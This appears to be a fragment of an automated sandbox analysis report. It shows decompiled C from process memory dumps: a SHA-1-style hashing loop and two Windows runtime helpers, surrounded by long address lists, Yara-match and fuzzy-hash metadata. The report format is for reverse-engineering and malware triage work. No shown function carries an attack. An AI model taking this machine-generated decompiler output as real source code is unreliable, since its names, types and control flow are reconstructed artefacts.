                                                                      				_t478 = 0x3c;
                                                                      				_v8 = 0x3c;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_t479 = _v8;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                      					_t346 = _v12;
                                                                      					_v16 = _t404;
                                                                      					_v12 = _t525;
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t358;
                                                                      					_t370 = _v12;
                                                                      					_v12 = _t445;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v16 = _t279;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                                      					_t404 = _v12;
                                                                      					_v12 = _t303;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t346;
                                                                      					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                      					_t305 = _t370;
                                                                      					_v8 = _t346;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t370;
                                                                      					_t358 = _v12;
                                                                      					_v12 = _t532;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t478 = _t479 + 5;
                                                                      					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t305;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t404;
                                                                      					_v12 = _t499;
                                                                      					_v8 = _t478;
                                                                      				} while (_t478 < 0x50);
                                                                      				_t480 = _a4;
                                                                      				_t480[2] = _t480[2] + _t358;
                                                                      				_t480[3] = _t480[3] + _t404;
                                                                      				_t311 = _t480[4] + _v16;
                                                                      				 *_t480 =  *_t480 + _t499;
                                                                      				_t480[1] = _t480[1] + _t279;
                                                                      				_t480[4] = _t311;
                                                                      				_t480[0x17] = 0;
                                                                      				return _t311;
                                                                      			}
































































                                                                      0x00408c6b
                                                                      0x00408c6f
                                                                      0x00408c71
                                                                      0x00408c71
                                                                      0x00408c74
                                                                      0x00408c96
                                                                      0x00408cbc
                                                                      0x00408ce2
                                                                      0x00408d04
                                                                      0x00408d0b
                                                                      0x00408d0e
                                                                      0x00408d11
                                                                      0x00408d1a
                                                                      0x00408d20
                                                                      0x00408d27
                                                                      0x00408d38
                                                                      0x00408d3b
                                                                      0x00408d3e
                                                                      0x00408d42
                                                                      0x00408d44
                                                                      0x00408d46
                                                                      0x00408d4f
                                                                      0x00408d52
                                                                      0x00408d55
                                                                      0x00408d60
                                                                      0x00408d66
                                                                      0x00408d68
                                                                      0x00408d68
                                                                      0x00408d6b
                                                                      0x00408d6e
                                                                      0x00408d6e
                                                                      0x00408d73
                                                                      0x00408d75
                                                                      0x00408d78
                                                                      0x00408d7b
                                                                      0x00408d81
                                                                      0x00408d84
                                                                      0x00408d87
                                                                      0x00408d90
                                                                      0x00408d96
                                                                      0x00408d9f
                                                                      0x00408dae
                                                                      0x00408db5
                                                                      0x00408db8
                                                                      0x00408dbb
                                                                      0x00408dc4
                                                                      0x00408dc7
                                                                      0x00408dca
                                                                      0x00408de2
                                                                      0x00408de9
                                                                      0x00408deb
                                                                      0x00408dee
                                                                      0x00408df1
                                                                      0x00408dfa
                                                                      0x00408e01
                                                                      0x00408e04
                                                                      0x00408e07
                                                                      0x00408e16
                                                                      0x00408e1d
                                                                      0x00408e20
                                                                      0x00408e23
                                                                      0x00408e2c
                                                                      0x00408e36
                                                                      0x00408e39
                                                                      0x00408e45
                                                                      0x00408e48
                                                                      0x00408e4f
                                                                      0x00408e52
                                                                      0x00408e55
                                                                      0x00408e5a
                                                                      0x00408e5d
                                                                      0x00408e66
                                                                      0x00408e77
                                                                      0x00408e7a
                                                                      0x00408e7d
                                                                      0x00408e84
                                                                      0x00408e87
                                                                      0x00408e8a
                                                                      0x00408e8d
                                                                      0x00408e8f
                                                                      0x00408e92
                                                                      0x00408e95
                                                                      0x00408e9e
                                                                      0x00408ea3
                                                                      0x00408ea3
                                                                      0x00408eb8
                                                                      0x00408ebb
                                                                      0x00408ebe
                                                                      0x00408ec5
                                                                      0x00408ec8
                                                                      0x00408ecb
                                                                      0x00408ee0
                                                                      0x00408ee7
                                                                      0x00408eea
                                                                      0x00408eee
                                                                      0x00408ef1
                                                                      0x00408ef6
                                                                      0x00408ef9
                                                                      0x00408f08
                                                                      0x00408f0b
                                                                      0x00408f12
                                                                      0x00408f15
                                                                      0x00408f18
                                                                      0x00408f1b
                                                                      0x00408f1e
                                                                      0x00408f26
                                                                      0x00408f34
                                                                      0x00408f37
                                                                      0x00408f3a
                                                                      0x00408f3a
                                                                      0x00408f41
                                                                      0x00408f44
                                                                      0x00408f47
                                                                      0x00408f4f
                                                                      0x00408f5d
                                                                      0x00408f60
                                                                      0x00408f67
                                                                      0x00408f6a
                                                                      0x00408f6d
                                                                      0x00408f70
                                                                      0x00408f73
                                                                      0x00408f7c
                                                                      0x00408f83
                                                                      0x00408f83
                                                                      0x00408f89
                                                                      0x00408fa2
                                                                      0x00408fa5
                                                                      0x00408fac
                                                                      0x00408faf
                                                                      0x00408fb2
                                                                      0x00408fc4
                                                                      0x00408fce
                                                                      0x00408fd1
                                                                      0x00408fda
                                                                      0x00408fdd
                                                                      0x00408fe4
                                                                      0x00408fe7
                                                                      0x00408fed
                                                                      0x00409000
                                                                      0x00409007
                                                                      0x0040900a
                                                                      0x0040900d
                                                                      0x00409010
                                                                      0x00409019
                                                                      0x0040901c
                                                                      0x0040902f
                                                                      0x00409032
                                                                      0x0040903c
                                                                      0x0040903f
                                                                      0x00409041
                                                                      0x0040904a
                                                                      0x0040904d
                                                                      0x00409060
                                                                      0x00409066
                                                                      0x00409069
                                                                      0x00409070
                                                                      0x00409072
                                                                      0x00409075
                                                                      0x00409078
                                                                      0x0040907b
                                                                      0x0040907e
                                                                      0x00409081
                                                                      0x0040908a
                                                                      0x0040908f
                                                                      0x00409092
                                                                      0x00409092
                                                                      0x004090a5
                                                                      0x004090a8
                                                                      0x004090ab
                                                                      0x004090b2
                                                                      0x004090b5
                                                                      0x004090b8
                                                                      0x004090bb
                                                                      0x004090ce
                                                                      0x004090d1
                                                                      0x004090dc
                                                                      0x004090df
                                                                      0x004090eb
                                                                      0x004090ee
                                                                      0x004090f4
                                                                      0x004090f7
                                                                      0x004090fa
                                                                      0x00409101
                                                                      0x00409111
                                                                      0x00409114
                                                                      0x0040911a
                                                                      0x0040911d
                                                                      0x00409124
                                                                      0x00409126
                                                                      0x00409129
                                                                      0x0040912c
                                                                      0x0040912f
                                                                      0x00409132
                                                                      0x00409139
                                                                      0x00409148
                                                                      0x0040914b
                                                                      0x00409152
                                                                      0x00409155
                                                                      0x00409158
                                                                      0x0040915b
                                                                      0x0040915e
                                                                      0x00409161
                                                                      0x00409164
                                                                      0x0040916d
                                                                      0x0040917e
                                                                      0x00409186
                                                                      0x0040918c
                                                                      0x0040918f
                                                                      0x00409191
                                                                      0x00409194
                                                                      0x00409197
                                                                      0x004091a4

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                      • Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
                                                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                      • Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00A1B944(signed int* __ecx, char __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int* _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				char _v77;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				char* _t73;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr _t78;
                                                                      				signed int _t82;
                                                                      				intOrPtr _t83;
                                                                      				void* _t87;
                                                                      				char _t88;
                                                                      				intOrPtr* _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t97;
                                                                      				intOrPtr _t100;
                                                                      				void* _t102;
                                                                      				void* _t107;
                                                                      				signed int _t108;
                                                                      				intOrPtr* _t112;
                                                                      				void* _t113;
                                                                      				intOrPtr* _t114;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t117;
                                                                      				signed int _t118;
                                                                      				void* _t130;
                                                                      
                                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                      				_v8 =  *0xaed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                      				_t112 = __ecx;
                                                                      				_v77 = __edx;
                                                                      				_v48 = __ecx;
                                                                      				_v28 = 0;
                                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                                      				_t105 =  *_t5;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				if(_t105 == 0) {
                                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                                      					_t60 =  *__ecx |  *_t50;
                                                                      					if(( *__ecx |  *_t50) != 0) {
                                                                      						 *__ecx = 0;
                                                                      						__ecx[1] = 0;
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t65 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t65 != 0) {
                                                                      							E00AC8CD6(_t112);
                                                                      						}
                                                                      						_push(0);
                                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t52);
                                                                      						_t60 = E00A39E20();
                                                                      					}
                                                                      					L20:
                                                                      					_pop(_t107);
                                                                      					_pop(_t113);
                                                                      					_pop(_t87);
                                                                      					return E00A3B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                      				}
                                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                                      				_t67 =  *_t8;
                                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                      				_t108 =  *(_t67 + 0x14);
                                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                      				_t105 = 0x2710;
                                                                      				asm("sbb eax, edi");
                                                                      				_v44 = _t88;
                                                                      				_v52 = _t108;
                                                                      				_t60 = E00A3CE00(_t97, _t68, 0x2710, 0);
                                                                      				_v56 = _t60;
                                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                      					L3:
                                                                      					 *(_t112 + 0x44) = _t60;
                                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                                      					 *_t112 = _t88;
                                                                      					 *(_t112 + 4) = _t108;
                                                                      					_v20 = _t60 * 0x2710;
                                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                                      					if(_v77 != 0) {
                                                                      						L16:
                                                                      						_v36 = _t88;
                                                                      						_v32 = _t108;
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t73 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t73 != 0) {
                                                                      							_t105 = _v40;
                                                                      							E00AC8F6A(_t112, _v40, _t88, _t108);
                                                                      						}
                                                                      						_push( &_v28);
                                                                      						_push(0);
                                                                      						_push( &_v36);
                                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t48);
                                                                      						_t60 = E00A3AF60();
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t89 = 0x7ffe03b0;
                                                                      						do {
                                                                      							_t114 = 0x7ffe0010;
                                                                      							do {
                                                                      								_t77 =  *0xae8628; // 0x0
                                                                      								_v68 = _t77;
                                                                      								_t78 =  *0xae862c; // 0x0
                                                                      								_v64 = _t78;
                                                                      								_v72 =  *_t89;
                                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                      								while(1) {
                                                                      									_t105 =  *0x7ffe000c;
                                                                      									_t100 =  *0x7ffe0008;
                                                                      									if(_t105 ==  *_t114) {
                                                                      										goto L8;
                                                                      									}
                                                                      									asm("pause");
                                                                      								}
                                                                      								L8:
                                                                      								_t89 = 0x7ffe03b0;
                                                                      								_t115 =  *0x7ffe03b0;
                                                                      								_t82 =  *0x7FFE03B4;
                                                                      								_v60 = _t115;
                                                                      								_t114 = 0x7ffe0010;
                                                                      								_v56 = _t82;
                                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                                      							_t83 =  *0xae8628; // 0x0
                                                                      							_t116 =  *0xae862c; // 0x0
                                                                      							_v76 = _t116;
                                                                      							_t117 = _v68;
                                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                                      						asm("sbb edx, [esp+0x24]");
                                                                      						_t102 = _t100 - _v60 - _t117;
                                                                      						_t112 = _v48;
                                                                      						_t91 = _v44;
                                                                      						asm("sbb edx, eax");
                                                                      						_t130 = _t105 - _v52;
                                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                      							_t88 = _t102 - _t91;
                                                                      							asm("sbb edx, edi");
                                                                      							_t108 = _t105;
                                                                      						} else {
                                                                      							_t88 = 0;
                                                                      							_t108 = 0;
                                                                      						}
                                                                      						goto L16;
                                                                      					}
                                                                      				} else {
                                                                      					if( *(_t112 + 0x44) == _t60) {
                                                                      						goto L20;
                                                                      					}
                                                                      					goto L3;
                                                                      				}
                                                                      			}
















































                                                                      0x00a1b94c
                                                                      0x00a1b956
                                                                      0x00a1b95c
                                                                      0x00a1b95e
                                                                      0x00a1b964
                                                                      0x00a1b969
                                                                      0x00a1b96d
                                                                      0x00a1b96d
                                                                      0x00a1b970
                                                                      0x00a1b974
                                                                      0x00a1b97a
                                                                      0x00a1badf
                                                                      0x00a1badf
                                                                      0x00a1bae2
                                                                      0x00a1bae4
                                                                      0x00a1bae6
                                                                      0x00a1baf0
                                                                      0x00a62cb8
                                                                      0x00a1baf6
                                                                      0x00a1baf6
                                                                      0x00a1baf6
                                                                      0x00a1bafd
                                                                      0x00a1bb1f
                                                                      0x00a1bb1f
                                                                      0x00a1baff
                                                                      0x00a1bb00
                                                                      0x00a1bb00
                                                                      0x00a1bb03
                                                                      0x00a1bb03
                                                                      0x00a1bacb
                                                                      0x00a1bacf
                                                                      0x00a1bad0
                                                                      0x00a1bad1
                                                                      0x00a1badc
                                                                      0x00a1badc
                                                                      0x00a1b980
                                                                      0x00a1b980
                                                                      0x00a1b988
                                                                      0x00a1b98b
                                                                      0x00a1b98d
                                                                      0x00a1b990
                                                                      0x00a1b993
                                                                      0x00a1b999
                                                                      0x00a1b99b
                                                                      0x00a1b9a1
                                                                      0x00a1b9a5
                                                                      0x00a1b9aa
                                                                      0x00a1b9b0
                                                                      0x00a1b9bb
                                                                      0x00a1b9c0
                                                                      0x00a1b9c3
                                                                      0x00a1b9ca
                                                                      0x00a1b9cc
                                                                      0x00a1b9cf
                                                                      0x00a1b9d3
                                                                      0x00a1b9d7
                                                                      0x00a1ba94
                                                                      0x00a1ba94
                                                                      0x00a1ba98
                                                                      0x00a1baa3
                                                                      0x00a62ccb
                                                                      0x00a1baa9
                                                                      0x00a1baa9
                                                                      0x00a1baa9
                                                                      0x00a1bab1
                                                                      0x00a62cd5
                                                                      0x00a62cdd
                                                                      0x00a62cdd
                                                                      0x00a1babb
                                                                      0x00a1babc
                                                                      0x00a1bac2
                                                                      0x00a1bac3
                                                                      0x00a1bac3
                                                                      0x00a1bac6
                                                                      0x00000000
                                                                      0x00a1b9dd
                                                                      0x00a1b9dd
                                                                      0x00a1b9e7
                                                                      0x00a1b9e7
                                                                      0x00a1b9ec
                                                                      0x00a1b9ec
                                                                      0x00a1b9f1
                                                                      0x00a1b9f5
                                                                      0x00a1b9fa
                                                                      0x00a1ba00
                                                                      0x00a1ba0c
                                                                      0x00a1ba10
                                                                      0x00a1ba10
                                                                      0x00a1ba12
                                                                      0x00a1ba18
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a1bb26
                                                                      0x00a1bb26
                                                                      0x00a1ba1e
                                                                      0x00a1ba1e
                                                                      0x00a1ba23
                                                                      0x00a1ba25
                                                                      0x00a1ba2c
                                                                      0x00a1ba30
                                                                      0x00a1ba35
                                                                      0x00a1ba35
                                                                      0x00a1ba41
                                                                      0x00a1ba46
                                                                      0x00a1ba4c
                                                                      0x00a1ba50
                                                                      0x00a1ba54
                                                                      0x00a1ba6a
                                                                      0x00a1ba6e
                                                                      0x00a1ba70
                                                                      0x00a1ba74
                                                                      0x00a1ba78
                                                                      0x00a1ba7a
                                                                      0x00a1ba7c
                                                                      0x00a1ba8e
                                                                      0x00a1ba90
                                                                      0x00a1ba92
                                                                      0x00a1bb14
                                                                      0x00a1bb14
                                                                      0x00a1bb16
                                                                      0x00a1bb16
                                                                      0x00000000
                                                                      0x00a1ba7c
                                                                      0x00a1bb0a
                                                                      0x00a1bb0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a1bb0f

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A1B9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: 50a3baea8d301358161ed7bf68534b333612474a81fa44b0f88afc2aef7cd67a
                                                                      • Instruction ID: 81a29dcfcc78e9437e4ad65d38fc2a9404a7106538996e81044ba91cd2e584a1
                                                                      • Opcode Fuzzy Hash: 50a3baea8d301358161ed7bf68534b333612474a81fa44b0f88afc2aef7cd67a
                                                                      • Instruction Fuzzy Hash: F4513571A18340CFC720DF69C58096ABBF5BF88750F24896EF58597255DB30EC84CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E009FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                      				signed int _t65;
                                                                      				signed short _t69;
                                                                      				intOrPtr _t70;
                                                                      				signed short _t85;
                                                                      				void* _t86;
                                                                      				signed short _t89;
                                                                      				signed short _t91;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr* _t98;
                                                                      				signed short _t99;
                                                                      				signed short _t101;
                                                                      				void* _t102;
                                                                      				char* _t103;
                                                                      				signed short _t104;
                                                                      				intOrPtr* _t110;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				intOrPtr* _t115;
                                                                      
                                                                      				_t109 = __esi;
                                                                      				_t108 = __edi;
                                                                      				_t106 = __edx;
                                                                      				_t95 = __ebx;
                                                                      				_push(0x90);
                                                                      				_push(0xacf7a8);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                      				if(__edx == 0xffffffff) {
                                                                      					L6:
                                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                      					__eflags = _t65 & 0x00000002;
                                                                      					if((_t65 & 0x00000002) != 0) {
                                                                      						L3:
                                                                      						L4:
                                                                      						return E00A4D130(_t95, _t108, _t109);
                                                                      					}
                                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                      					_t108 = 0;
                                                                      					_t109 = 0;
                                                                      					_t95 = 0;
                                                                      					__eflags = 0;
                                                                      					while(1) {
                                                                      						__eflags = _t95 - 0x200;
                                                                      						if(_t95 >= 0x200) {
                                                                      							break;
                                                                      						}
                                                                      						E00A3D000(0x80);
                                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                      						_t108 = _t115;
                                                                      						_t95 = _t95 - 0xffffff80;
                                                                      						_t17 = _t114 - 4;
                                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                      						__eflags =  *_t17;
                                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t102 = _t110 + 1;
                                                                      						do {
                                                                      							_t85 =  *_t110;
                                                                      							_t110 = _t110 + 1;
                                                                      							__eflags = _t85;
                                                                      						} while (_t85 != 0);
                                                                      						_t111 = _t110 - _t102;
                                                                      						_t21 = _t95 - 1; // -129
                                                                      						_t86 = _t21;
                                                                      						__eflags = _t111 - _t86;
                                                                      						if(_t111 > _t86) {
                                                                      							_t111 = _t86;
                                                                      						}
                                                                      						E00A3F3E0(_t108, _t106, _t111);
                                                                      						_t115 = _t115 + 0xc;
                                                                      						_t103 = _t111 + _t108;
                                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                      						_t89 = _t95 - _t111;
                                                                      						__eflags = _t89;
                                                                      						_push(0);
                                                                      						if(_t89 == 0) {
                                                                      							L15:
                                                                      							_t109 = 0xc000000d;
                                                                      							goto L16;
                                                                      						} else {
                                                                      							__eflags = _t89 - 0x7fffffff;
                                                                      							if(_t89 <= 0x7fffffff) {
                                                                      								L16:
                                                                      								 *(_t114 - 0x94) = _t109;
                                                                      								__eflags = _t109;
                                                                      								if(_t109 < 0) {
                                                                      									__eflags = _t89;
                                                                      									if(_t89 != 0) {
                                                                      										 *_t103 = 0;
                                                                      									}
                                                                      									L26:
                                                                      									 *(_t114 - 0xa0) = _t109;
                                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                                      									__eflags = _t109;
                                                                      									if(_t109 >= 0) {
                                                                      										L31:
                                                                      										_t98 = _t108;
                                                                      										_t39 = _t98 + 1; // 0x1
                                                                      										_t106 = _t39;
                                                                      										do {
                                                                      											_t69 =  *_t98;
                                                                      											_t98 = _t98 + 1;
                                                                      											__eflags = _t69;
                                                                      										} while (_t69 != 0);
                                                                      										_t99 = _t98 - _t106;
                                                                      										__eflags = _t99;
                                                                      										L34:
                                                                      										_t70 =  *[fs:0x30];
                                                                      										__eflags =  *((char*)(_t70 + 2));
                                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                                      											L40:
                                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                      											 *(_t114 - 4) = 1;
                                                                      											_push(_t114 - 0x74);
                                                                      											L00A4DEF0(_t99, _t106);
                                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      											goto L3;
                                                                      										}
                                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                      											goto L40;
                                                                      										}
                                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                      										_push(_t99 & 0x0000ffff);
                                                                      										_push(_t108);
                                                                      										_push(1);
                                                                      										_t101 = E00A3B280();
                                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                      											__eflags = _t101 - 0x80000003;
                                                                      											if(_t101 == 0x80000003) {
                                                                      												E00A3B7E0(1);
                                                                      												_t101 = 0;
                                                                      												__eflags = 0;
                                                                      											}
                                                                      										}
                                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      										goto L4;
                                                                      									}
                                                                      									__eflags = _t109 - 0x80000005;
                                                                      									if(_t109 == 0x80000005) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								 *(_t114 - 0x90) = 0;
                                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                      								_t91 = E00A3E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                      								_t115 = _t115 + 0x10;
                                                                      								_t104 = _t91;
                                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                      								__eflags = _t104;
                                                                      								if(_t104 < 0) {
                                                                      									L21:
                                                                      									_t109 = 0x80000005;
                                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                                      									L22:
                                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                      									L23:
                                                                      									 *(_t114 - 0x94) = _t109;
                                                                      									goto L26;
                                                                      								}
                                                                      								__eflags = _t104 - _t92;
                                                                      								if(__eflags > 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      					}
                                                                      					__eflags = _t109;
                                                                      					if(_t109 >= 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					__eflags = _t109 - 0x80000005;
                                                                      					if(_t109 != 0x80000005) {
                                                                      						goto L31;
                                                                      					}
                                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                      					_t38 = _t95 - 1; // -129
                                                                      					_t99 = _t38;
                                                                      					goto L34;
                                                                      				}
                                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                      					__eflags = __edx - 0x65;
                                                                      					if(__edx != 0x65) {
                                                                      						goto L2;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				L2:
                                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                                      				_push(_t106);
                                                                      				if(E00A3A890() != 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				goto L3;
                                                                      			}






















                                                                      0x009fb171
                                                                      0x009fb171
                                                                      0x009fb171
                                                                      0x009fb171
                                                                      0x009fb171
                                                                      0x009fb176
                                                                      0x009fb17b
                                                                      0x009fb180
                                                                      0x009fb186
                                                                      0x009fb18f
                                                                      0x009fb198
                                                                      0x009fb1a4
                                                                      0x009fb1aa
                                                                      0x00a54802
                                                                      0x00a54802
                                                                      0x00a54805
                                                                      0x00a5480c
                                                                      0x00a5480e
                                                                      0x009fb1d1
                                                                      0x009fb1d3
                                                                      0x009fb1de
                                                                      0x009fb1de
                                                                      0x00a54817
                                                                      0x00a5481e
                                                                      0x00a54820
                                                                      0x00a54822
                                                                      0x00a54822
                                                                      0x00a54824
                                                                      0x00a54824
                                                                      0x00a5482a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a54835
                                                                      0x00a5483a
                                                                      0x00a5483d
                                                                      0x00a5483f
                                                                      0x00a54842
                                                                      0x00a54842
                                                                      0x00a54842
                                                                      0x00a54846
                                                                      0x00a5484c
                                                                      0x00a5484e
                                                                      0x00a54851
                                                                      0x00a54851
                                                                      0x00a54853
                                                                      0x00a54854
                                                                      0x00a54854
                                                                      0x00a54858
                                                                      0x00a5485a
                                                                      0x00a5485a
                                                                      0x00a5485d
                                                                      0x00a5485f
                                                                      0x00a54861
                                                                      0x00a54861
                                                                      0x00a54866
                                                                      0x00a5486b
                                                                      0x00a5486e
                                                                      0x00a54871
                                                                      0x00a54876
                                                                      0x00a54876
                                                                      0x00a54878
                                                                      0x00a5487b
                                                                      0x00a54884
                                                                      0x00a54884
                                                                      0x00000000
